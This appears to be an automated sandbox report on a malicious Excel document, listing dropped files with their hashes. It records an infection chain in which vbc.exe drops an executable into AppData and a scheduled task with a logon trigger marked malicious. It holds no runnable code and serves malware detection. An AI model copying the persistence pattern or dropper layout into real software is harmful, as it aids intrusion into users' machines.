                                    Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37582CD5.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AAC3DEF.emf
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                    Category:dropped
                                    Size (bytes):498420
                                    Entropy (8bit):0.6413939525004806
                                    Encrypted:false
                                    SSDEEP:384:0JXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:0JXwBkNWZ3cjvmWa+VDO
                                    MD5:883A0909725C3877917457D6650A7419
                                    SHA1:655EB1BCBC14145E8D6C49CF674EC6AB1EF99BB1
                                    SHA-256:5B0DBAE8314EEF7EC3EC75553423735EEBA87A894A21220E46FB4494BAEF0E22
                                    SHA-512:8938B351F688B0AEF72C0771B150711E5BFBE31B9D69D0ECED56F14A53090F150368033C7FF356045ADA807BC427B1335EB471693B6B063A19E1FEBE54C688AC
                                    Malicious:false
                                    Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................Y$...@.o..f.Y.@".%.....o.`.o.......o.D.o.RQ>[..o...o.....,.o...o.$Q>[..o...o. ...Id.Y..o...o. .........t..d.Y............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........P.o.X.....o...o..8.Y......t.dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\522424D2.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DAD64F1.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77C35F24.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
                                    Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7ACF70CD.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):10202
                                    Entropy (8bit):7.870143202588524
                                    Encrypted:false
                                    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                    MD5:66EF10508ED9AE9871D59F267FBE15AA
                                    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                    Malicious:false
                                    Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC7AC69.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
                                    Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B38F263E.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):19408
                                    Entropy (8bit):7.931403681362504
                                    Encrypted:false
                                    SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                    MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                    SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                    SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                    SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B76C8963.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):68702
                                    Entropy (8bit):7.960564589117156
                                    Encrypted:false
                                    SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                    MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                    SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                    SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                    SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E38FA527.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):11303
                                    Entropy (8bit):7.909402464702408
                                    Encrypted:false
                                    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E77F686A.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):42465
                                    Entropy (8bit):7.979580180885764
                                    Encrypted:false
                                    SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                    MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                    SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                    SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                    SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAE7ECFC.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):6364
                                    Entropy (8bit):7.935202367366306
                                    Encrypted:false
                                    SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                    MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                    SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                    SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                    SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EB6C08.png
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):14828
                                    Entropy (8bit):7.9434227607871355
                                    Encrypted:false
                                    SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                    MD5:58DD6AF7C438B638A88D107CC87009C7
                                    SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                    SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                    SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:XML 1.0 document, ASCII text
                                    Category:dropped
                                    Size (bytes):1578
                                    Entropy (8bit):5.108460768399864
                                    Encrypted:false
                                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtwxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTAv
                                    MD5:5A018129C464113B52BC5573A3B1B93C
                                    SHA1:6F17FA4E34555C3A38D4BCED9FFFFE97C14FF7B0
                                    SHA-256:3DD3408806D339789B8AB7878072025238D4DAD182810DDEBC19CA68569B57E8
                                    SHA-512:B12739C10849BDEE9387E06B943592C2CF6E0A41C88EE1134FD6A3CAA3547CDACE0C7CDB36C3C1A7328BF4418FDB850B0262A09EDA20474DC3264A69998BEA6C
                                    Malicious:true
                                    Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                    C:\Users\user\AppData\Local\Temp\~DF0437710B50B493BA.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DF8260883CA3EB749E.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:CDFV2 Encrypted
                                    Category:dropped
                                    Size (bytes):234600
                                    Entropy (8bit):7.971193076260305
                                    Encrypted:false
                                    SSDEEP:6144:HkrpOY+fhX0Iop0jRpwyDczCg7DZ1PBxdTiRLbqO7:HkrpOJhDo0j7wywzj7DD5/TabT
                                    MD5:F49E322B837835AC60CAD8C173ECFF31
                                    SHA1:C7CDDFBF865B528D1BBBBE5C5F3974279CC8B6F5
                                    SHA-256:FF4E17D62CE9C71164879418E7942CECF8DB37B16CB66ADEBC6C2570840F8524
                                    SHA-512:C5CE7FEB4A44D0A3C0BA17C1104D599409C66C1A36E68F382DF9048E18F02349C16CF4DE21437F988E4779CE56847B9574DD83562DD1239BC88358922E2826B9
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DF9A98EC95844A9751.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    C:\Users\user\AppData\Local\Temp\~DFBA44D8F3B40A3F94.TMP
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R7HWQA7HZJYT21Z3G4UU.temp
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5846139722878556
                                    Encrypted:false
                                    SSDEEP:96:chQC4MqGqvsqvJCwoBz8hQC4MqGqvsEHyqvJCwor/ztAKrVHypxpyX3lUVLA2:cm7oBz8mvHnor/zt58f8X4A2
                                    MD5:247B62A1E21D993F810B83CF19997157
                                    SHA1:43974401B3DA0E188A101465DC510105D64D7222
                                    SHA-256:A95B81263776693FAAA622A07365AE7FB40F60FE6F0E30E71F1C790AC25B6D8D
                                    SHA-512:B32597386AE62602BCAC5BE6A20FC3731814D8F96D2BF1351D746F0BDC7372CBB49C42A86C59D7E1CAF3AB21F1232FE3E555EE7BC88D1BE8B94355ADAC6EB9D9
                                    Malicious:false
                                    C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
                                    Process:C:\Users\Public\vbc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):723456
                                    Entropy (8bit):7.763310640308659
                                    Encrypted:false
                                    SSDEEP:12288:EBzcmhiTIqqxiWT/niO1/pFbHfi17evEf6BFMmEJWixDw/1LgyHixBFmRq:EBomhikV4WzNpFDfi1gqmwK1syHi1Wq
                                    MD5:0F88779E9500075DE85E916637305164
                                    SHA1:EE1B3AF259E9F03239441681F00AADDD28E4E8FB
                                    SHA-256:C98EAC88F8F4243D7303B806CB58E0A89E33270CB4B33457C91938A2B2746238
